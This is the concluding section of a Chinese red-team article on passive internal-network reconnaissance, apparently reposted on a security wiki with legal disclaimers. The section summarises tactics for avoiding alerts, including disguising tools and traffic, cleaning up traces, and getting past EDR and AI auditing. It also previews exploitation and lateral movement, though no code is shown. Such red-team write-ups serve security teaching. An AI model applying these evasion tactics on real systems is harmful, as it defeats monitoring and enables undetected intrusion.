0x5 实战总结与后续展望(从0到1,落地可复用)
本文从0开始,完整记录了XX云高防护环境、中小企业基础防护环境两种典型场景的被动踩点全流程,补充了大量原创实战技巧,解决了实战中常见的URL报错、工具下载报错、EDR拦截、AI审计等核心问题,所有操作均可复现,所有脚本可直接复制执行,适配不同防护等级的内网环境。
核心总结(从0到1关键要点)
- 前期准备是关键:从0开始,授权、跳板机、工具准备缺一不可,提前规避80%的失败风险;
- 隐蔽性是核心:被动踩点的核心的是“不触发告警”,工具伪装、流量伪装、痕迹清理是三大关键步骤,原创技巧可大幅提升隐蔽性;
- 报错处置是重点:遇到URL、网页解析、工具报错,不盲目放弃,通过被动分析、调整方式,可挖掘高价值资产;
- 场景差异化:高防护场景(XX云)需复杂伪装、合规清理;基础防护场景(中小企业)可简化操作,高效定位核心资产。
后续展望
本文仅记录被动踩点全流程,后续可基于本次定位的核心资产,开展漏洞利用、权限提升、横向移动等操作,后续将补充相关实战记录,欢迎各位师傅交流补充,共同提升内网渗透实战能力。
专家讲师:Yumu | 10 年安全攻防经验 FALSESPACE WIKI 将复杂降维,让知识共享 2026
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:异空间安全 异空间安全雨幕 异空间安全雨幕《2026 红蓝对抗实录:从 0 到 1,内网被动踩点全流程》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论